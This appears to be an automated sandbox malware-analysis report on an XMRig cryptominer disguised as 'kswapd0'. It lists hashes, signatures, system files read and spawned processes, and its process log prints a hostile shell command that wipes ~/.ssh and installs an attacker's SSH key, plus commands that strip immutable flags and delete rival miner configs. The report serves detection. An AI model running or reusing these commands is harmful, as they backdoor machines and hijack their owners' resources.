Overview
overview
10Static
static
7.rsync/a/a
ubuntu-18.04-amd64
10.rsync/a/a
debian-9-armhf
10.rsync/a/a
debian-9-mips
7.rsync/a/a
debian-9-mipsel
7.rsync/a/init0
ubuntu-18.04-amd64
6.rsync/a/init0
debian-9-armhf
6.rsync/a/init0
debian-9-mips
6.rsync/a/init0
debian-9-mipsel
6.rsync/a/kswapd0
ubuntu-18.04-amd64
10.rsync/a/run
ubuntu-18.04-amd64
3.rsync/a/run
debian-9-armhf
3.rsync/a/run
debian-9-mips
3.rsync/a/run
debian-9-mipsel
3.rsync/a/stop
ubuntu-18.04-amd64
10.rsync/a/stop
debian-9-armhf
10.rsync/a/stop
debian-9-mips
6.rsync/a/stop
debian-9-mipsel
6.rsync/b/a
ubuntu-18.04-amd64
7.rsync/b/a
debian-9-armhf
7.rsync/b/a
debian-9-mips
6.rsync/b/a
debian-9-mipsel
7.rsync/b/run
ubuntu-18.04-amd64
7.rsync/b/run
debian-9-armhf
7.rsync/b/run
debian-9-mips
7.rsync/b/run
debian-9-mipsel
7.rsync/b/stop
ubuntu-18.04-amd64
6.rsync/b/stop
debian-9-armhf
6.rsync/b/stop
debian-9-mips
6.rsync/b/stop
debian-9-mipsel
6.rsync/c/blitz
ubuntu-18.04-amd64
1.rsync/c/blitz
debian-9-armhf
1.rsync/c/blitz
debian-9-mips
1Analysis
-
max time kernel
149s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
07/03/2024, 18:02
Behavioral task
behavioral1
Sample
.rsync/a/a
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral2
Sample
.rsync/a/a
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral3
Sample
.rsync/a/a
Resource
debian9-mipsbe-20240226-en
debian-9-mips
Behavioral task
behavioral4
Sample
.rsync/a/a
Resource
debian9-mipsel-20240226-en
debian-9-mipsel
Behavioral task
behavioral5
Sample
.rsync/a/init0
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral6
Sample
.rsync/a/init0
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral7
Sample
.rsync/a/init0
Resource
debian9-mipsbe-20240226-en
debian-9-mips
Behavioral task
behavioral8
Sample
.rsync/a/init0
Resource
debian9-mipsel-20240226-en
debian-9-mipsel
Behavioral task
behavioral9
Sample
.rsync/a/kswapd0
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral10
Sample
.rsync/a/run
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral11
Sample
.rsync/a/run
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral12
Sample
.rsync/a/run
Resource
debian9-mipsbe-20240226-en
debian-9-mips
Behavioral task
behavioral13
Sample
.rsync/a/run
Resource
debian9-mipsel-20240226-en
debian-9-mipsel
Behavioral task
behavioral14
Sample
.rsync/a/stop
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral15
Sample
.rsync/a/stop
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral16
Sample
.rsync/a/stop
Resource
debian9-mipsbe-20240226-en
debian-9-mips
Behavioral task
behavioral17
Sample
.rsync/a/stop
Resource
debian9-mipsel-20240226-en
debian-9-mipsel
Behavioral task
behavioral18
Sample
.rsync/b/a
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral19
Sample
.rsync/b/a
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral20
Sample
.rsync/b/a
Resource
debian9-mipsbe-20240226-en
debian-9-mips
Behavioral task
behavioral21
Sample
.rsync/b/a
Resource
debian9-mipsel-20240226-en
debian-9-mipsel
Behavioral task
behavioral22
Sample
.rsync/b/run
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral23
Sample
.rsync/b/run
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral24
Sample
.rsync/b/run
Resource
debian9-mipsbe-20240226-en
debian-9-mips
Behavioral task
behavioral25
Sample
.rsync/b/run
Resource
debian9-mipsel-20240226-en
debian-9-mipsel
Behavioral task
behavioral26
Sample
.rsync/b/stop
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral27
Sample
.rsync/b/stop
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral28
Sample
.rsync/b/stop
Resource
debian9-mipsbe-20240226-en
debian-9-mips
Behavioral task
behavioral29
Sample
.rsync/b/stop
Resource
debian9-mipsel-20240226-en
debian-9-mipsel
Behavioral task
behavioral30
Sample
.rsync/c/blitz
Resource
ubuntu1804-amd64-20240226-en
ubuntu-18.04-amd64
Behavioral task
behavioral31
Sample
.rsync/c/blitz
Resource
debian9-armhf-20240226-en
debian-9-armhf
Behavioral task
behavioral32
Sample
.rsync/c/blitz
Resource
debian9-mipsbe-20240226-en
debian-9-mips
General
-
Target
.rsync/a/kswapd0
-
Size
2.1MB
-
MD5
8da798989b6e48fb211674b652119a8c
-
SHA1
ffe36761ebc571f086d06e8a3b5cb3adc5ce8deb
-
SHA256
8acfbcd3da37b25ae2f2d88115c4b1b05c75e2e9face918e3f21fa10cc3126b4
-
SHA512
1859b99e1cfa246807d51cec8441b00d0a21251d46198a92b10e7bcf3a4d764a48ba54953da2d79cdbb2d9e29d95d2a6c86c2a34e0968409dbedf9baff807f3b
-
SSDEEP
49152:XNcjlR90c88OeWSUiyLspBFLKb52pzTduYRSt4rxIugUWsfCfbws:9WPQheWvi9TKV29TdjxICWeCTws
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Attempts to change immutable files 2 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1587 chattr 1589 chattr -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo kswapd0 -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name kswapd0 File opened for reading /sys/devices/virtual/dmi/id/board_vendor kswapd0 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor kswapd0 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor kswapd0 -
Reads CPU attributes 1 TTPs 45 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/topology/core_siblings kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity kswapd0 File opened for reading /sys/devices/system/cpu/possible kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets kswapd0 File opened for reading /sys/devices/system/cpu/online kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition kswapd0 File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map kswapd0 -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag kswapd0 File opened for reading /sys/devices/virtual/dmi/id/bios_version kswapd0 File opened for reading /sys/devices/virtual/dmi/id/board_serial kswapd0 File opened for reading /sys/devices/virtual/dmi/id/chassis_type kswapd0 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial kswapd0 File opened for reading /sys/devices/virtual/dmi/id/board_name kswapd0 File opened for reading /sys/devices/virtual/dmi/id/board_version kswapd0 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag kswapd0 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor kswapd0 File opened for reading /sys/devices/virtual/dmi/id/chassis_version kswapd0 File opened for reading /sys/devices/virtual/dmi/id/bios_date kswapd0 File opened for reading /sys/devices/virtual/dmi/id/product_version kswapd0 File opened for reading /sys/devices/virtual/dmi/id/product_serial kswapd0 File opened for reading /sys/devices/virtual/dmi/id/product_uuid kswapd0 -
Enumerates kernel/hardware configuration 1 TTPs 23 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages kswapd0 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages kswapd0 File opened for reading /sys/firmware/dmi/tables/smbios_entry_point Process not Found File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages Process not Found File opened for reading /sys/fs/cgroup/unified/cgroup.controllers kswapd0 File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems kswapd0 File opened for reading /sys/devices/system/node/node0/access0/initiators kswapd0 File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency kswapd0 File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency kswapd0 File opened for reading /sys/devices/system/node/node0/meminfo kswapd0 File opened for reading /sys/bus/dax/devices kswapd0 File opened for reading /sys/devices/system/node/node0/hugepages kswapd0 File opened for reading /sys/devices/virtual/dmi/id kswapd0 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages Process not Found File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus kswapd0 File opened for reading /sys/kernel/mm/hugepages kswapd0 File opened for reading /sys/devices/system/node/node0/cpumap kswapd0 File opened for reading /sys/devices/system/node/node0/access1/initiators kswapd0 File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth kswapd0 File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth kswapd0 File opened for reading /sys/firmware/dmi/tables/DMI Process not Found File opened for reading /sys/devices/system/cpu kswapd0 File opened for reading /sys/devices/system/node/online kswapd0 -
Reads runtime system information 6 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/self/exe kswapd0 File opened for reading /proc/mounts kswapd0 File opened for reading /proc/self/cpuset kswapd0 File opened for reading /proc/meminfo kswapd0 File opened for reading /proc/driver/nvidia/gpus kswapd0 File opened for reading /proc/meminfo Process not Found -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.rsync/a/cert_key.pem kswapd0 File opened for modification /tmp/.rsync/a/cert.pem kswapd0
Processes
-
/tmp/.rsync/a/kswapd0/tmp/.rsync/a/kswapd01⤵
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1584 -
/bin/shsh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"2⤵PID:1585
-
-
/bin/shsh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"2⤵PID:1586
-
/usr/bin/chattrchattr -ia "~/.xmrig.json"3⤵
- Attempts to change immutable files
PID:1587
-
-
/bin/rmrm -rf "~/.xmrig.json"3⤵PID:1588
-
-
/usr/bin/chattrchattr -ia "~/.config/xmrig.json"3⤵
- Attempts to change immutable files
PID:1589
-
-
/bin/rmrm -rf "~/.config/xmrig.json"3⤵PID:1590
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52ef721e7ec98dbcee7c0a1e2142d0dad
SHA1f2ff2f3dcb411a03c163d839f70d7b887d5e584a
SHA256b927f61eebf680ce68c511ec5970dbdab70e1a51b0054238a00875a82b109e4a
SHA512924c13946704c61585efa12e4ac54f038bbf7c0ed025d7d78d1a48794daa0048bfb0085c6ae64c7a0e872dfbf9269bddf87983cbbec48e7ba6fc3dd156ea2b58